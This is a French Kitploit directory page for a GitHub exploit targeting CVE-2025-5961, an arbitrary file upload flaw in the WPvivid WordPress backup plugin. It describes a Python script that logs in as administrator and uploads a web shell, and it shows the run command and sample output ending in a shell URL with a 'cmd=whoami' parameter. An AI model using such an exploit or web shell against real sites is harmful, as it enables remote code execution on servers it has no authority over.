Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5961 — Migration, Sauvegarde, Staging – WPvivid Backup & Migration <= 0.9.116 - Authentifié (Administrateur+) Téléchargement de fichier arbitraire | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-5961
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-5961

CVE-2025-5961

Migration, Sauvegarde, Staging – WPvivid Backup & Migration <= 0.9.116 - Authentifié (Administrateur+) Téléchargement de fichier arbitraire

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authentifié (Administrateur+) Téléchargement arbitraire de fichiers

📈 Cette vulnérabilité affecte un plugin avec plus de 700 000+ installations


📝 Détails CVE

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (Haute)
  • Publié: 3 juillet 2025

🔍 Description

Le plugin Migration, Backup, Staging – WPvivid Backup & Migration pour WordPress est vulnérable au téléchargement arbitraire de fichiers en raison de l'absence de validation du type de fichier dans la fonction wpvivid_upload_import_files dans toutes les versions jusqu'à 0.9.116 incluse.

Cela permet aux attaquants authentifiés (niveau Administrateur et supérieur) de télécharger des fichiers arbitraires sur le serveur, ce qui permet potentiellement l'exécution de code à distance.


🧰 Script

Ce dépôt contient un script d'exploitation pour CVE-2025-5961, écrit en Python, qui :

  • Vérifie la version du plugin.
  • Se connecte en tant qu'Administrateur.
  • Extrait le nonce requis à partir de la page du plugin.
  • Télécharge une charge utile de web shell.
  • Affiche l'URL pour accéder au shell.

🖥️ Exemple d'utilisation

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ Utilisation

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 Exemple de sortie

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ Avertissement

Ce script est fourni uniquement à des fins éducatives et de recherche.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.


✍️ Par

Khaled Alenazi (Nxploited)
🌐 GitHub

Télécharger l’outil